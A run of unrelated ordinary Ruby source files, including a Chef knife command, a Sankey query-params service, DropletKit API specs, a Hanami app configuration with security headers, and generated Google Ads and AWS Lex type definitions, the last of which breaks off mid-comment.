receive(:batch).and_yield(statsd) passenger_status.each do |key, *value| expect(statsd).to receive(:gauge).with(key, *value) end subject.run end end end
# Sample code from Programing Ruby, page 448 File.join("usr", "mail", "gumby")
# # # Author:: Adam Jacob (<adam@opscode.com>) # Copyright:: Copyright (c) 2009 Opscode, Inc. # License:: Apache License, Version 2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # require 'chef/knife' class Chef class Knife class CookbookMetadata < Knife deps do require 'chef/cookbook_loader' require 'chef/cookbook/metadata' end banner "knife cookbook metadata COOKBOOK (options)" option :cookbook_path, :short => "-o PATH:PATH", :long => "--cookbook-path PATH:PATH", :description => "A colon-separated path to look for cookbooks in", :proc => lambda { |o| o.split(":") } option :all, :short => "-a", :long => "--all", :description => "Generate metadata for all cookbooks, rather than just a single cookbook" def run config[:cookbook_path] ||= Chef::Config[:cookbook_path] if config[:all] cl = Chef::CookbookLoader.new(config[:cookbook_path]) cl.each do |cname, cookbook| generate_metadata(cname.to_s) end else cookbook_name = @name_args[0] if cookbook_name.nil? || cookbook_name.empty? ui.error "You must specify the cookbook to generate metadata for, or use the --all option." exit 1 end generate_metadata(cookbook_name) end end def generate_metadata(cookbook) Array(config[:cookbook_path]).reverse.each do |path| file = File.expand_path(File.join(path, cookbook, 'metadata.rb')) if File.exists?(file) generate_metadata_from_file(cookbook, file) else validate_metadata_json(path, cookbook) end end end def generate_metadata_from_file(cookbook, file) ui.info("Generating metadata for #{cookbook} from #{file}") md = Chef::Cookbook::Metadata.new md.name(cookbook) md.from_file(file) json_file = File.join(File.dirname(file), 'metadata.json') File.open(json_file, "w") do |f| f.write(Chef::JSONCompat.to_json_pretty(md)) end generated = true Chef::Log.debug("Generated #{json_file}") rescue Exceptions::ObsoleteDependencySyntax, Exceptions::InvalidVersionConstraint => e ui.stderr.puts "ERROR: The cookbook '#{cookbook}' contains invalid or obsolete metadata syntax." ui.stderr.puts "in #{file}:" ui.stderr.puts ui.stderr.puts e.message exit 1 end def validate_metadata_json(path, cookbook) json_file = File.join(path, cookbook, 'metadata.json') if File.exist?(json_file) Chef::Cookbook::Metadata.validate_json(IO.read(json_file)) end rescue Exceptions::ObsoleteDependencySyntax, Exceptions::InvalidVersionConstraint => e ui.stderr.puts "ERROR: The cookbook '#{cookbook}' contains invalid or obsolete metadata syntax." ui.stderr.puts "in #{json_file}:" ui.stderr.puts ui.stderr.puts e.message exit 1 end end end end
# This service to be used as part of the importer script # to amend any node ids stored in sankey_card_links.query_params # that might have got out of sync. module Api module V3 module SankeyCardLinks class QueryParams include Singleton def cleanup(query_params) cleaned_query_params = query_params.dup all_query_param_wrappers = node_query_param_wrappers.merge( node_type_query_param_wrappers ) all_query_param_wrappers.map do |qp_name, qp_wrapper| next unless cleaned_query_params[qp_name].present? cleaned_query_params[qp_name] = qp_wrapper.new( cleaned_query_params.delete(qp_name) ).cleaned_value end cleaned_query_params end def nodes_ids(query_params) node_query_param_wrappers.map do |qp_name, qp_wrapper| qp_wrapper.new(query_params[qp_name]).to_ary end.flatten.uniq end def node_query_param_wrappers { 'selectedNodesIds' => ArrayList, 'extraColumnNodeId' => SingleElement, 'sources' => CommaSeparatedList, 'companies' => CommaSeparatedList, 'exporters' => CommaSeparatedList, 'importers' => CommaSeparatedList, 'destinations' => CommaSeparatedList } end def node_types_ids(query_params) node_type_query_param_wrappers.map do |qp_name, qp_wrapper| qp_wrapper.new(query_params[qp_name]).to_ary end.flatten.uniq end def node_type_query_param_wrappers { 'selectedColumnsIds' => SankeyColumnsList } end end # list wrapper for array lists ArrayList = Struct.new(:value) do def to_ary return [] unless value.present? cleaned_value end def &(ary) to_ary & ary end def -(ary) to_ary - ary end def delete!(ary) self.value = to_ary - ary end def replace!(old_ary, new_ary) self.value = (to_ary - old_ary + new_ary) end def cleaned_value value.map(&:to_i) end end # list wrapper for single element SingleElement = Struct.new(:value) do def to_ary return [] unless value.present? [cleaned_value] end def &(ary) to_ary & ary end def -(ary) to_ary - ary end def delete!(ary) self.value = (to_ary - ary).first end def replace!(old_ary, new_ary) self.value = (to_ary - old_ary + new_ary).first end def cleaned_value value&.to_i end end # list wrapper for comma separated lists CommaSeparatedList = Struct.new(:value) do def excluded_prefix? value =~ /^excluded_/ end def to_ary return [] unless value.present? value_to_split = if excluded_prefix? value.sub(/^excluded_/, '') else value end value_to_split.split(',').map(&:to_i) end def &(ary) to_ary & ary end def -(ary) to_ary - ary end def delete!(ary) joined_value = (to_ary - ary).join(',') update_value(joined_value) end def replace!(old_ary, new_ary) joined_value = (to_ary - old_ary + new_ary).join(',') update_value(joined_value) end def update_value(joined_value) if excluded_prefix? self.value = "excluded_#{joined_value}" else self.value = joined_value end end def cleaned_value value end end # list wrapper for mad sankey node types list format SankeyColumnsList = Struct.new(:value) do def columns_map return {} unless value.is_a? String Hash[ value.split('-').map do |column_with_id| column, id = column_with_id.split('_').map(&:to_i) end ] end def columns_list(columns_map) columns_map.map do |column, id| "#{column}_#{id}" end.join('-') end def to_ary return [] unless value.present? columns_map.values.map(&:to_i) end def &(ary) to_ary & ary end def -(ary) to_ary - ary end def delete!(ary) keys_to_delete = ary.map { |e| columns_map.key(e) } new_columns_map = columns_map.except(*keys_to_delete) update_value(columns_list(new_columns_map)) end def replace!(old_ary, new_ary) keys_to_update = old_ary.map { |e| columns_map.key(e) } new_columns_map = columns_map.except(*keys_to_update) keys_to_update.each.with_index do |key, idx| new_columns_map[key] = new_ary[idx] end update_value(columns_list(new_columns_map)) end def update_value(joined_value) if !joined_value.blank? self.value = joined_value else self.value = nil end end def cleaned_value value end end end end end
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: google/ads/googleads/v5/errors/authorization_error.proto require 'google/protobuf' require 'google/api/annotations_pb' Google::Protobuf::DescriptorPool.generated_pool.build do add_file("google/ads/googleads/v5/errors/authorization_error.proto", :syntax => :proto3) do add_message "google.ads.googleads.v5.errors.AuthorizationErrorEnum" do end add_enum "google.ads.googleads.v5.errors.AuthorizationErrorEnum.AuthorizationError" do value :UNSPECIFIED, 0 value :UNKNOWN, 1 value :USER_PERMISSION_DENIED, 2 value :DEVELOPER_TOKEN_NOT_ON_ALLOWLIST, 13 value :DEVELOPER_TOKEN_PROHIBITED, 4 value :PROJECT_DISABLED, 5 value :AUTHORIZATION_ERROR, 6 value :ACTION_NOT_PERMITTED, 7 value :INCOMPLETE_SIGNUP, 8 value :CUSTOMER_NOT_ENABLED, 24 value :MISSING_TOS, 9 value :DEVELOPER_TOKEN_NOT_APPROVED, 10 value :INVALID_LOGIN_CUSTOMER_ID_SERVING_CUSTOMER_ID_COMBINATION, 11 value :SERVICE_ACCESS_DENIED, 12 end end end module Google module Ads module GoogleAds module V5 module Errors AuthorizationErrorEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v5.errors.AuthorizationErrorEnum").msgclass AuthorizationErrorEnum::AuthorizationError = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v5.errors.AuthorizationErrorEnum.AuthorizationError").enummodule end end end end end
require 'spec_helper' RSpec.describe DropletKit::DropletActionResource do subject(:resource) { described_class.new(connection: connection) } let(:droplet_id) { 1066 } let(:fixture) { api_fixture("droplet_actions/#{action}") } include_context 'resources' describe '#action_for_id' do let(:action) { 'event' } let(:path) { "/v2/droplets/#{droplet_id}/actions" } let(:fixture) { api_fixture('droplet_actions/find') } it 'performs the action' do request = stub_do_api(path, :post).with( body: { type: action, param_1: 1, param_2: 2 }.to_json ).to_return(body: fixture, status: 201) resource.action_for_id(droplet_id: droplet_id, type: action, param_1: 1, param_2: 2) expect(request).to have_been_made end end describe '#action_for_tag' do let(:action) { 'event' } let(:path) { '/v2/droplets/actions' } let(:fixture) { api_fixture('droplet_actions/find') } it 'performs the action' do request = stub_do_api(path, :post).with( body: { tag_name: 'test-tag', type: action, param_1: 1, param_2: 2 }.to_json ).to_return(body: fixture, status: 201) resource.action_for_tag(tag_name: 'test-tag', type: action, param_1: 1, param_2: 2) expect(request).to have_been_made end end described_class::ACTIONS_WITHOUT_INPUT.each do |action_name| describe "Action #{action_name}" do let(:action) { action_name } let(:path) { "/v2/droplets/#{droplet_id}/actions" } it 'performs the action' do request = stub_do_api(path, :post).with( body: { type: action }.to_json ).to_return(body: fixture, status: 201) returned_action = resource.send(action, droplet_id: droplet_id) expect(request).to have_been_made expect(returned_action.type).to eq(action) end it_behaves_like 'an action that handles invalid parameters' do let(:object) { DropletKit::Droplet.new } let(:arguments) { { droplet_id: droplet_id } } end end end described_class::TAG_ACTIONS.each do |action_name| describe "Batch Action #{action_name}" do let(:action) { "#{action_name}_for_tag" } let(:path) { "/v2/droplets/actions?tag_name=testing-1" } let(:fixture) do single_action = DropletKit::ActionMapping.extract_single(api_fixture("droplet_actions/#{action_name}"), :read) DropletKit::ActionMapping.represent_collection_for(:read, [single_action]) end it 'performs the action' do request = stub_do_api(path, :post).with( body: { type: action_name }.to_json ).to_return(body: fixture, status: 201) returned_actions = resource.send(action, tag_name: 'testing-1') expect(request).to have_been_made expect(returned_actions.first.type).to eq(action_name) end end end describe "Action snapshot" do let(:action) { 'snapshot' } it 'performs the action' do request = stub_do_api("/v2/droplets/#{droplet_id}/actions", :post).with( body: { type: action, name: 'Dwight' }.to_json ).to_return(body: fixture, status: 201) returned_action = resource.send(action, droplet_id: droplet_id, name: 'Dwight') expect(request).to have_been_made expect(returned_action.type).to eq(action) end end describe "Action change_kernel" do let(:action) { 'change_kernel' } it 'performs the action' do request = stub_do_api("/v2/droplets/#{droplet_id}/actions", :post).with( body: { type: action, kernel: 1556 }.to_json ).to_return(body: fixture, status: 201) returned_action = resource.send(action, droplet_id: droplet_id, kernel: 1556) expect(request).to have_been_made expect(returned_action.type).to eq(action) end end describe "Action rename" do let(:action) { 'rename' } it 'performs the action' do request = stub_do_api("/v2/droplets/#{droplet_id}/actions", :post).with( body: { type: action, name: 'newname.com' }.to_json ).to_return(body: fixture, status: 201) returned_action = resource.send(action, droplet_id: droplet_id, name: 'newname.com') expect(request).to have_been_made expect(returned_action.type).to eq(action) end end describe "Action rebuild" do let(:action) { 'rebuild' } it 'performs the action' do request = stub_do_api("/v2/droplets/#{droplet_id}/actions", :post).with( body: { type: action, image: 'ubuntu-14-04-x86' }.to_json ).to_return(body: fixture, status: 201) returned_action = resource.send(action, droplet_id: droplet_id, image: 'ubuntu-14-04-x86') expect(request).to have_been_made expect(returned_action.type).to eq(action) end end describe "Action restore" do let(:action) { 'restore' } it 'performs the action' do request = stub_do_api("/v2/droplets/#{droplet_id}/actions", :post).with( body: { type: action, image: 'ubuntu-14-04-x86' }.to_json ).to_return(body: fixture, status: 201) returned_action = resource.send(action, droplet_id: droplet_id, image: 'ubuntu-14-04-x86') expect(request).to have_been_made expect(returned_action.type).to eq(action) end end describe "Action resize" do let(:action) { 'resize' } it 'performs the action' do request = stub_do_api("/v2/droplets/#{droplet_id}/actions", :post).with( body: { type: action, size: '1gb', disk: nil }.to_json ).to_return(body: fixture, status: 201) returned_action = resource.send(action, droplet_id: droplet_id, size: '1gb') expect(request).to have_been_made expect(returned_action.type).to eq(action) end end describe "Action resize with disk" do let(:action) { 'resize' } it 'performs the action' do request = stub_do_api("/v2/droplets/#{droplet_id}/actions", :post).with( body: { type: action, size: '1gb', disk: true }.to_json ).to_return(body: fixture, status: 201) returned_action = resource.send(action, droplet_id: droplet_id, size: '1gb', disk: true) expect(request).to have_been_made expect(returned_action.type).to eq(action) end end describe '#find' do it 'returns an action' do request = stub_do_api("/v2/droplets/1066/actions/123", :get).to_return( body: api_fixture('droplet_actions/find') ) returned_action = resource.find(droplet_id: 1066, id: 123) expect(request).to have_been_made expect(returned_action.type).to eq('test') expect(returned_action.started_at).to eq("2014-07-29T14:35:27Z") expect(returned_action.completed_at).to eq(nil) expect(returned_action.resource_id).to eq(nil) expect(returned_action.resource_type).to eq("backend") expect(returned_action.region_slug).to eq('nyc1') expect(returned_action.region).to be_kind_of(DropletKit::Region) expect(returned_action.region.slug).to eq('nyc1') expect(returned_action.region.name).to eq('New York') expect(returned_action.region.sizes).to include('512mb') expect(returned_action.region.available).to be(true) expect(returned_action.region.features).to include("virtio", "private_networking", "backups", "ipv6", "metadata") end it_behaves_like 'resource that handles common errors' do let(:path) { '/v2/droplets/1066/actions/123' } let(:method) { :get } let(:action) { :find } let(:arguments) { { droplet_id: 1066, id: 123 } } end end end
# frozen_string_literal: true require 'hanami/helpers' module Web class Application < Hanami::Application configure do ## # BASIC # # Define the root path of this application. # All paths specified in this configuration are relative to path below. # root __dir__ # Relative load paths where this application will recursively load the # code. # # When you add new directories, remember to add them here. # load_paths << %w[ controllers views ] # Handle exceptions with HTTP statuses (true) or don't catch them (false). # Defaults to true. # See: http://www.rubydoc.info/gems/hanami-controller/#Exceptions_management # # handle_exceptions true ## # HTTP # # Routes definitions for this application # See: http://www.rubydoc.info/gems/hanami-router#Usage # routes 'config/routes' # URI scheme used by the routing system to generate absolute URLs # Defaults to "http" # # scheme 'https' # URI host used by the routing system to generate absolute URLs # Defaults to "localhost" # # host 'example.org' # URI port used by the routing system to generate absolute URLs # Argument: An object coercible to integer, defaults to 80 if the scheme # is http and 443 if it's https # # This should only be configured if app listens to non-standard ports # # port 443 # Enable cookies # Argument: boolean to toggle the feature # A Hash with options # # Options: # :domain - The domain (String - nil by default, not required) # :path - Restrict cookies to a relative URI # (String - nil by default) # :max_age - Cookies expiration expressed in seconds # (Integer - nil by default) # :secure - Restrict cookies to secure connections # (Boolean - Automatically true when using HTTPS) # See #scheme and #ssl? # :httponly - Prevent JavaScript access (Boolean - true by default) # # cookies true # or # cookies max_age: 300 # Enable sessions # Argument: Symbol the Rack session adapter # A Hash with options # # See: http://www.rubydoc.info/gems/rack/Rack/Session/Cookie # sessions :cookie, secret: ENV.fetch('WEB_SESSIONS_SECRET') # Configure Rack middleware for this application # # middleware.use Rack::Protection middleware.use Warden::Manager do |manager| manager.failure_app = Web::Controllers::Home::Index.new end # Default format for the requests that don't specify an HTTP_ACCEPT header # Argument: A symbol representation of a mime type, defaults to :html # default_request_format :html # Default format for responses that don't consider the request format # Argument: A symbol representation of a mime type, defaults to :html # default_response_format :html ## # TEMPLATES # # The layout to be used by all views # layout :application # It will load Web::Views::ApplicationLayout # The relative path to templates # templates 'templates' ## # ASSETS # # assets do # JavaScript compressor # # Supported engines: # # * :builtin # * :uglifier # * :yui # * :closure # # See: http://hanamirb.org/guides/assets/compressors # # In order to skip JavaScript compression comment the following line # javascript_compressor :builtin # Stylesheet compressor # # Supported engines: # # * :builtin # * :yui # * :sass # # See: http://hanamirb.org/guides/assets/compressors # # In order to skip stylesheet compression comment the following line # stylesheet_compressor :builtin # Specify sources for assets # # sources << [ # 'assets' # ] # end ## # SECURITY # # X-Frame-Options is a HTTP header supported by modern browsers. # It determines if a web page can or cannot be included via <frame> and # <iframe> tags by untrusted domains. # # Web applications can send this header to prevent Clickjacking attacks. # # Read more at: # # * https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options # * https://www.owasp.org/index.php/Clickjacking # security.x_frame_options 'DENY' # X-Content-Type-Options prevents browsers from interpreting files as # something else than declared by the content type in the HTTP headers. # # Read more at: # # * https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Content-Type-Options # * https://msdn.microsoft.com/en-us/library/gg622941%28v=vs.85%29.aspx # * https://blogs.msdn.microsoft.com/ie/2008/09/02/ie8-security-part-vi-beta-2-update # security.x_content_type_options 'nosniff' # X-XSS-Protection is a HTTP header to determine the behavior of the # browser in case an XSS attack is detected. # # Read more at: # # * https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) # * https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-XSS-Protection # security.x_xss_protection '1; mode=block' # Content-Security-Policy (CSP) is a HTTP header supported by modern # browsers. It determines trusted sources of execution for dynamic # contents (JavaScript) or other web related assets: stylesheets, images, # fonts, plugins, etc. # # Web applications can send this header to mitigate Cross Site Scripting # (XSS) attacks. # # The default value allows images, scripts, AJAX, fonts and CSS from the # same origin, and does not allow any other resources to load (eg object, # frame, media, etc). # # Inline JavaScript is NOT allowed. To enable it, please use: # "script-src 'unsafe-inline'". # # Content Security Policy introduction: # # * http://www.html5rocks.com/en/tutorials/security/content-security-policy/ # * https://www.owasp.org/index.php/Content_Security_Policy # * https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 # # Inline and eval JavaScript risks: # # * http://www.html5rocks.com/en/tutorials/security/content-security-policy/#inline-code-considered-harmful # * http://www.html5rocks.com/en/tutorials/security/content-security-policy/#eval-too # # Content Security Policy usage: # # * http://content-security-policy.com/ # * https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Using_Content_Security_Policy # # Content Security Policy references: # # * https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives # security.content_security_policy %( form-action 'self'; frame-ancestors 'self'; base-uri 'self'; default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self' https: data:; style-src 'self' 'unsafe-inline' https:; font-src 'self'; object-src 'none'; plugin-types application/pdf; child-src 'self'; frame-src 'self'; media-src 'self' ) ## # FRAMEWORKS # # Configure the code that will yield each time Web::Action is included # This is useful for sharing common functionality # # See: http://www.rubydoc.info/gems/hanami-controller#Configuration controller.prepare do # include MyAuthentication # included in all the actions # before :authenticate! # run an authentication before callback include Web::Authentication end # Configure the code that will yield each time Web::View is included # This is useful for sharing common functionality # # See: http://www.rubydoc.info/gems/hanami-view#Configuration view.prepare do include Hanami::Helpers include Web::Assets::Helpers end end ## # DEVELOPMENT # configure :development do # Don't handle exceptions, render the stack trace handle_exceptions false end ## # TEST # configure :test do # Don't handle exceptions, render the stack trace handle_exceptions false end ## # PRODUCTION # configure :production do # scheme 'https' # host 'example.org' # port 443 assets do # Don't compile static assets in production mode (eg. Sass, ES6) # # See: http://www.rubydoc.info/gems/hanami-assets#Configuration compile false # Use fingerprint file name for asset paths # # See: http://hanamirb.org/guides/assets/overview fingerprint false # Content Delivery Network (CDN) # # See: http://hanamirb.org/guides/assets/content-delivery-network # # scheme 'https' # host 'cdn.example.org' # port 443 # Subresource Integrity # # See: http://hanamirb.org/guides/assets/content-delivery-network/#subresource-integrity # subresource_integrity :sha256 end end end end
# frozen_string_literal: true # WARNING ABOUT GENERATED CODE # # This file is generated. See the contributing guide for more information: # https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md # # WARNING ABOUT GENERATED CODE module Aws::LexModelBuildingService module Types # The request is not well formed. For example, a value is invalid or a # required field is missing. Check the field values, and try again. # # @!attribute [rw] message # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/BadRequestException AWS API Documentation # class BadRequestException < Struct.new( :message) SENSITIVE = [] include Aws::Structure end # Provides information about a bot alias. # # @!attribute [rw] name # The name of the bot alias. # @return [String] # # @!attribute [rw] description # A description of the bot alias. # @return [String] # # @!attribute [rw] bot_version # The version of the Amazon Lex bot to which the alias points. # @return [String] # # @!attribute [rw] bot_name # The name of the bot to which the alias points. # @return [String] # # @!attribute [rw] last_updated_date # The date that the bot alias was updated. When you create a resource, # the creation date and last updated date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the bot alias was created. # @return [Time] # # @!attribute [rw] checksum # Checksum of the bot alias. # @return [String] # # @!attribute [rw] conversation_logs # Settings that determine how Amazon Lex uses conversation logs for # the alias. # @return [Types::ConversationLogsResponse] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/BotAliasMetadata AWS API Documentation # class BotAliasMetadata < Struct.new( :name, :description, :bot_version, :bot_name, :last_updated_date, :created_date, :checksum, :conversation_logs) SENSITIVE = [] include Aws::Structure end # Represents an association between an Amazon Lex bot and an external # messaging platform. # # @!attribute [rw] name # The name of the association between the bot and the channel. # @return [String] # # @!attribute [rw] description # A text description of the association you are creating. # @return [String] # # @!attribute [rw] bot_alias # An alias pointing to the specific version of the Amazon Lex bot to # which this association is being made. # @return [String] # # @!attribute [rw] bot_name # The name of the Amazon Lex bot to which this association is being # made. # # <note markdown="1"> Currently, Amazon Lex supports associations with Facebook and Slack, # and Twilio. # # </note> # @return [String] # # @!attribute [rw] created_date # The date that the association between the Amazon Lex bot and the # channel was created. # @return [Time] # # @!attribute [rw] type # Specifies the type of association by indicating the type of channel # being established between the Amazon Lex bot and the external # messaging platform. # @return [String] # # @!attribute [rw] bot_configuration # Provides information necessary to communicate with the messaging # platform. # @return [Hash<String,String>] # # @!attribute [rw] status # The status of the bot channel. # # * `CREATED` - The channel has been created and is ready for use. # # * `IN_PROGRESS` - Channel creation is in progress. # # * `FAILED` - There was an error creating the channel. For # information about the reason for the failure, see the # `failureReason` field. # @return [String] # # @!attribute [rw] failure_reason # If `status` is `FAILED`, Amazon Lex provides the reason that it # failed to create the association. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/BotChannelAssociation AWS API Documentation # class BotChannelAssociation < Struct.new( :name, :description, :bot_alias, :bot_name, :created_date, :type, :bot_configuration, :status, :failure_reason) SENSITIVE = [:bot_configuration] include Aws::Structure end # Provides information about a bot. . # # @!attribute [rw] name # The name of the bot. # @return [String] # # @!attribute [rw] description # A description of the bot. # @return [String] # # @!attribute [rw] status # The status of the bot. # @return [String] # # @!attribute [rw] last_updated_date # The date that the bot was updated. When you create a bot, the # creation date and last updated date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the bot was created. # @return [Time] # # @!attribute [rw] version # The version of the bot. For a new bot, the version is always # `$LATEST`. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/BotMetadata AWS API Documentation # class BotMetadata < Struct.new( :name, :description, :status, :last_updated_date, :created_date, :version) SENSITIVE = [] include Aws::Structure end # Provides metadata for a built-in intent. # # @!attribute [rw] signature # A unique identifier for the built-in intent. To find the signature # for an intent, see [Standard Built-in Intents][1] in the *Alexa # Skills Kit*. # # # # [1]: https://developer.amazon.com/public/solutions/alexa/alexa-skills-kit/docs/built-in-intent-ref/standard-intents # @return [String] # # @!attribute [rw] supported_locales # A list of identifiers for the locales that the intent supports. # @return [Array<String>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/BuiltinIntentMetadata AWS API Documentation # class BuiltinIntentMetadata < Struct.new( :signature, :supported_locales) SENSITIVE = [] include Aws::Structure end # Provides information about a slot used in a built-in intent. # # @!attribute [rw] name # A list of the slots defined for the intent. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/BuiltinIntentSlot AWS API Documentation # class BuiltinIntentSlot < Struct.new( :name) SENSITIVE = [] include Aws::Structure end # Provides information about a built in slot type. # # @!attribute [rw] signature # A unique identifier for the built-in slot type. To find the # signature for a slot type, see [Slot Type Reference][1] in the # *Alexa Skills Kit*. # # # # [1]: https://developer.amazon.com/public/solutions/alexa/alexa-skills-kit/docs/built-in-intent-ref/slot-type-reference # @return [String] # # @!attribute [rw] supported_locales # A list of target locales for the slot. # @return [Array<String>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/BuiltinSlotTypeMetadata AWS API Documentation # class BuiltinSlotTypeMetadata < Struct.new( :signature, :supported_locales) SENSITIVE = [] include Aws::Structure end # Specifies a Lambda function that verifies requests to a bot or # fulfills the user's request to a bot.. # # @note When making an API call, you may pass CodeHook # data as a hash: # # { # uri: "LambdaARN", # required # message_version: "MessageVersion", # required # } # # @!attribute [rw] uri # The Amazon Resource Name (ARN) of the Lambda function. # @return [String] # # @!attribute [rw] message_version # The version of the request-response that you want Amazon Lex to use # to invoke your Lambda function. For more information, see # using-lambda. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/CodeHook AWS API Documentation # class CodeHook < Struct.new( :uri, :message_version) SENSITIVE = [] include Aws::Structure end # There was a conflict processing the request. Try your request again. # # @!attribute [rw] message # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/ConflictException AWS API Documentation # class ConflictException < Struct.new( :message) SENSITIVE = [] include Aws::Structure end # Provides the settings needed for conversation logs. # # @note When making an API call, you may pass ConversationLogsRequest # data as a hash: # # { # log_settings: [ # required # { # log_type: "AUDIO", # required, accepts AUDIO, TEXT # destination: "CLOUDWATCH_LOGS", # required, accepts CLOUDWATCH_LOGS, S3 # kms_key_arn: "KmsKeyArn", # resource_arn: "ResourceArn", # required # }, # ], # iam_role_arn: "IamRoleArn", # required # } # # @!attribute [rw] log_settings # The settings for your conversation logs. You can log the # conversation text, conversation audio, or both. # @return [Array<Types::LogSettingsRequest>] # # @!attribute [rw] iam_role_arn # The Amazon Resource Name (ARN) of an IAM role with permission to # write to your CloudWatch Logs for text logs and your S3 bucket for # audio logs. If audio encryption is enabled, this role also provides # access permission for the AWS KMS key used for encrypting audio # logs. For more information, see [Creating an IAM Role and Policy for # Conversation Logs][1]. # # # # [1]: https://docs.aws.amazon.com/lex/latest/dg/conversation-logs-role-and-policy.html # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/ConversationLogsRequest AWS API Documentation # class ConversationLogsRequest < Struct.new( :log_settings, :iam_role_arn) SENSITIVE = [] include Aws::Structure end # Contains information about conversation log settings. # # @!attribute [rw] log_settings # The settings for your conversation logs. You can log text, audio, or # both. # @return [Array<Types::LogSettingsResponse>] # # @!attribute [rw] iam_role_arn # The Amazon Resource Name (ARN) of the IAM role used to write your # logs to CloudWatch Logs or an S3 bucket. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/ConversationLogsResponse AWS API Documentation # class ConversationLogsResponse < Struct.new( :log_settings, :iam_role_arn) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass CreateBotVersionRequest # data as a hash: # # { # name: "BotName", # required # checksum: "String", # } # # @!attribute [rw] name # The name of the bot that you want to create a new version of. The # name is case sensitive. # @return [String] # # @!attribute [rw] checksum # Identifies a specific revision of the `$LATEST` version of the bot. # If you specify a checksum and the `$LATEST` version of the bot has a # different checksum, a `PreconditionFailedException` exception is # returned and Amazon Lex doesn't publish a new version. If you # don't specify a checksum, Amazon Lex publishes the `$LATEST` # version. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/CreateBotVersionRequest AWS API Documentation # class CreateBotVersionRequest < Struct.new( :name, :checksum) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the bot. # @return [String] # # @!attribute [rw] description # A description of the bot. # @return [String] # # @!attribute [rw] intents # An array of `Intent` objects. For more information, see PutBot. # @return [Array<Types::Intent>] # # @!attribute [rw] clarification_prompt # The message that Amazon Lex uses when it doesn't understand the # user's request. For more information, see PutBot. # @return [Types::Prompt] # # @!attribute [rw] abort_statement # The message that Amazon Lex uses to cancel a conversation. For more # information, see PutBot. # @return [Types::Statement] # # @!attribute [rw] status # When you send a request to create or update a bot, Amazon Lex sets # the `status` response element to `BUILDING`. After Amazon Lex builds # the bot, it sets `status` to `READY`. If Amazon Lex can't build the # bot, it sets `status` to `FAILED`. Amazon Lex returns the reason for # the failure in the `failureReason` response element. # @return [String] # # @!attribute [rw] failure_reason # If `status` is `FAILED`, Amazon Lex provides the reason that it # failed to build the bot. # @return [String] # # @!attribute [rw] last_updated_date # The date when the `$LATEST` version of this bot was updated. # @return [Time] # # @!attribute [rw] created_date # The date when the bot version was created. # @return [Time] # # @!attribute [rw] idle_session_ttl_in_seconds # The maximum time in seconds that Amazon Lex retains the data # gathered in a conversation. For more information, see PutBot. # @return [Integer] # # @!attribute [rw] voice_id # The Amazon Polly voice ID that Amazon Lex uses for voice # interactions with the user. # @return [String] # # @!attribute [rw] checksum # Checksum identifying the version of the bot that was created. # @return [String] # # @!attribute [rw] version # The version of the bot. # @return [String] # # @!attribute [rw] locale # Specifies the target locale for the bot. # @return [String] # # @!attribute [rw] child_directed # For each Amazon Lex bot created with the Amazon Lex Model Building # Service, you must specify whether your use of Amazon Lex is related # to a website, program, or other application that is directed or # targeted, in whole or in part, to children under age 13 and subject # to the Children's Online Privacy Protection Act (COPPA) by # specifying `true` or `false` in the `childDirected` field. By # specifying `true` in the `childDirected` field, you confirm that # your use of Amazon Lex **is** related to a website, program, or # other application that is directed or targeted, in whole or in part, # to children under age 13 and subject to COPPA. By specifying `false` # in the `childDirected` field, you confirm that your use of Amazon # Lex **is not** related to a website, program, or other application # that is directed or targeted, in whole or in part, to children under # age 13 and subject to COPPA. You may not specify a default value for # the `childDirected` field that does not accurately reflect whether # your use of Amazon Lex is related to a website, program, or other # application that is directed or targeted, in whole or in part, to # children under age 13 and subject to COPPA. # # If your use of Amazon Lex relates to a website, program, or other # application that is directed in whole or in part, to children under # age 13, you must obtain any required verifiable parental consent # under COPPA. For information regarding the use of Amazon Lex in # connection with websites, programs, or other applications that are # directed or targeted, in whole or in part, to children under age 13, # see the [Amazon Lex FAQ.][1] # # # # [1]: https://aws.amazon.com/lex/faqs#data-security # @return [Boolean] # # @!attribute [rw] enable_model_improvements # Indicates whether the bot uses accuracy improvements. `true` # indicates that the bot is using the improvements, otherwise, # `false`. # @return [Boolean] # # @!attribute [rw] detect_sentiment # Indicates whether utterances entered by the user should be sent to # Amazon Comprehend for sentiment analysis. # @return [Boolean] # # @see 